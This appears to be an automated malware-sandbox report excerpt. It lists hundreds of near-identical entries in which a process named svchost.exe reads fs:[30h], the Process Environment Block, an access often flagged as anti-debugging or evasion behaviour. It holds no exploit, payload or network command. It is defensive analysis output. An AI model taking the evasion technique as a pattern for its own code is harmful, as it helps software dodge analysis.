                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734260 mov eax, dword ptr fs:[00000030h]4_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734260 mov eax, dword ptr fs:[00000030h]4_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734260 mov eax, dword ptr fs:[00000030h]4_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372826B mov eax, dword ptr fs:[00000030h]4_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A250 mov eax, dword ptr fs:[00000030h]4_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736259 mov eax, dword ptr fs:[00000030h]4_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EA250 mov eax, dword ptr fs:[00000030h]4_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EA250 mov eax, dword ptr fs:[00000030h]4_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B8243 mov eax, dword ptr fs:[00000030h]4_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B8243 mov ecx, dword ptr fs:[00000030h]4_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372823B mov eax, dword ptr fs:[00000030h]4_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037402E1 mov eax, dword ptr fs:[00000030h]4_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037402E1 mov eax, dword ptr fs:[00000030h]4_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037402E1 mov eax, dword ptr fs:[00000030h]4_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A2C3 mov eax, dword ptr fs:[00000030h]4_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A2C3 mov eax, dword ptr fs:[00000030h]4_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A2C3 mov eax, dword ptr fs:[00000030h]4_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A2C3 mov eax, dword ptr fs:[00000030h]4_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A2C3 mov eax, dword ptr fs:[00000030h]4_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037402A0 mov eax, dword ptr fs:[00000030h]4_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037402A0 mov eax, dword ptr fs:[00000030h]4_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C62A0 mov eax, dword ptr fs:[00000030h]4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C62A0 mov ecx, dword ptr fs:[00000030h]4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C62A0 mov eax, dword ptr fs:[00000030h]4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C62A0 mov eax, dword ptr fs:[00000030h]4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C62A0 mov eax, dword ptr fs:[00000030h]4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C62A0 mov eax, dword ptr fs:[00000030h]4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E284 mov eax, dword ptr fs:[00000030h]4_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E284 mov eax, dword ptr fs:[00000030h]4_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B0283 mov eax, dword ptr fs:[00000030h]4_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B0283 mov eax, dword ptr fs:[00000030h]4_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B0283 mov eax, dword ptr fs:[00000030h]4_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C156 mov eax, dword ptr fs:[00000030h]4_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C8158 mov eax, dword ptr fs:[00000030h]4_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736154 mov eax, dword ptr fs:[00000030h]4_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736154 mov eax, dword ptr fs:[00000030h]4_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C4144 mov eax, dword ptr fs:[00000030h]4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C4144 mov eax, dword ptr fs:[00000030h]4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C4144 mov ecx, dword ptr fs:[00000030h]4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C4144 mov eax, dword ptr fs:[00000030h]4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C4144 mov eax, dword ptr fs:[00000030h]4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03760124 mov eax, dword ptr fs:[00000030h]4_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DA118 mov ecx, dword ptr fs:[00000030h]4_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DA118 mov eax, dword ptr fs:[00000030h]4_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DA118 mov eax, dword ptr fs:[00000030h]4_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DA118 mov eax, dword ptr fs:[00000030h]4_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_038061E5 mov eax, dword ptr fs:[00000030h]4_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F0115 mov eax, dword ptr fs:[00000030h]4_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov ecx, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov ecx, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov ecx, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE10E mov ecx, dword ptr fs:[00000030h]4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037601F8 mov eax, dword ptr fs:[00000030h]4_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE1D0 mov eax, dword ptr fs:[00000030h]4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE1D0 mov eax, dword ptr fs:[00000030h]4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE1D0 mov eax, dword ptr fs:[00000030h]4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE1D0 mov eax, dword ptr fs:[00000030h]4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F61C3 mov eax, dword ptr fs:[00000030h]4_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F61C3 mov eax, dword ptr fs:[00000030h]4_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B019F mov eax, dword ptr fs:[00000030h]4_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B019F mov eax, dword ptr fs:[00000030h]4_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B019F mov eax, dword ptr fs:[00000030h]4_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B019F mov eax, dword ptr fs:[00000030h]4_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A197 mov eax, dword ptr fs:[00000030h]4_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A197 mov eax, dword ptr fs:[00000030h]4_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A197 mov eax, dword ptr fs:[00000030h]4_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03770185 mov eax, dword ptr fs:[00000030h]4_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EC188 mov eax, dword ptr fs:[00000030h]4_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EC188 mov eax, dword ptr fs:[00000030h]4_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D4180 mov eax, dword ptr fs:[00000030h]4_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D4180 mov eax, dword ptr fs:[00000030h]4_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375C073 mov eax, dword ptr fs:[00000030h]4_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732050 mov eax, dword ptr fs:[00000030h]4_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6050 mov eax, dword ptr fs:[00000030h]4_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6030 mov eax, dword ptr fs:[00000030h]4_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A020 mov eax, dword ptr fs:[00000030h]4_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C020 mov eax, dword ptr fs:[00000030h]4_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B4000 mov ecx, dword ptr fs:[00000030h]4_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C0F0 mov eax, dword ptr fs:[00000030h]4_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037720F0 mov ecx, dword ptr fs:[00000030h]4_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037380E9 mov eax, dword ptr fs:[00000030h]4_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B60E0 mov eax, dword ptr fs:[00000030h]4_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B20DE mov eax, dword ptr fs:[00000030h]4_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F60B8 mov eax, dword ptr fs:[00000030h]4_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F60B8 mov ecx, dword ptr fs:[00000030h]4_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C80A8 mov eax, dword ptr fs:[00000030h]4_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373208A mov eax, dword ptr fs:[00000030h]4_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738770 mov eax, dword ptr fs:[00000030h]4_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730750 mov eax, dword ptr fs:[00000030h]4_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE75D mov eax, dword ptr fs:[00000030h]4_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772750 mov eax, dword ptr fs:[00000030h]4_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772750 mov eax, dword ptr fs:[00000030h]4_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B4755 mov eax, dword ptr fs:[00000030h]4_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376674D mov esi, dword ptr fs:[00000030h]4_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376674D mov eax, dword ptr fs:[00000030h]4_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376674D mov eax, dword ptr fs:[00000030h]4_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376273C mov eax, dword ptr fs:[00000030h]4_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376273C mov ecx, dword ptr fs:[00000030h]4_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376273C mov eax, dword ptr fs:[00000030h]4_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AC730 mov eax, dword ptr fs:[00000030h]4_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C720 mov eax, dword ptr fs:[00000030h]4_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C720 mov eax, dword ptr fs:[00000030h]4_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730710 mov eax, dword ptr fs:[00000030h]4_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03760710 mov eax, dword ptr fs:[00000030h]4_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C700 mov eax, dword ptr fs:[00000030h]4_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037347FB mov eax, dword ptr fs:[00000030h]4_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037347FB mov eax, dword ptr fs:[00000030h]4_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037527ED mov eax, dword ptr fs:[00000030h]4_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037527ED mov eax, dword ptr fs:[00000030h]4_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037527ED mov eax, dword ptr fs:[00000030h]4_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE7E1 mov eax, dword ptr fs:[00000030h]4_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373C7C0 mov eax, dword ptr fs:[00000030h]4_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B07C3 mov eax, dword ptr fs:[00000030h]4_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037307AF mov eax, dword ptr fs:[00000030h]4_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E47A0 mov eax, dword ptr fs:[00000030h]4_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D678E mov eax, dword ptr fs:[00000030h]4_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03762674 mov eax, dword ptr fs:[00000030h]4_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F866E mov eax, dword ptr fs:[00000030h]4_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F866E mov eax, dword ptr fs:[00000030h]4_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A660 mov eax, dword ptr fs:[00000030h]4_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A660 mov eax, dword ptr fs:[00000030h]4_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374C640 mov eax, dword ptr fs:[00000030h]4_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E627 mov eax, dword ptr fs:[00000030h]4_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03766620 mov eax, dword ptr fs:[00000030h]4_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768620 mov eax, dword ptr fs:[00000030h]4_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373262C mov eax, dword ptr fs:[00000030h]4_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772619 mov eax, dword ptr fs:[00000030h]4_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE609 mov eax, dword ptr fs:[00000030h]4_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B06F1 mov eax, dword ptr fs:[00000030h]4_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B06F1 mov eax, dword ptr fs:[00000030h]4_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A6C7 mov eax, dword ptr fs:[00000030h]4_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037666B0 mov eax, dword ptr fs:[00000030h]4_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C6A6 mov eax, dword ptr fs:[00000030h]4_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734690 mov eax, dword ptr fs:[00000030h]4_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734690 mov eax, dword ptr fs:[00000030h]4_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376656A mov eax, dword ptr fs:[00000030h]4_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376656A mov eax, dword ptr fs:[00000030h]4_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376656A mov eax, dword ptr fs:[00000030h]4_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738550 mov eax, dword ptr fs:[00000030h]4_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738550 mov eax, dword ptr fs:[00000030h]4_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6500 mov eax, dword ptr fs:[00000030h]4_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037325E0 mov eax, dword ptr fs:[00000030h]4_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C5ED mov eax, dword ptr fs:[00000030h]4_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C5ED mov eax, dword ptr fs:[00000030h]4_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037365D0 mov eax, dword ptr fs:[00000030h]4_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A5D0 mov eax, dword ptr fs:[00000030h]4_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A5D0 mov eax, dword ptr fs:[00000030h]4_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E5CF mov eax, dword ptr fs:[00000030h]4_2_0376E5CF
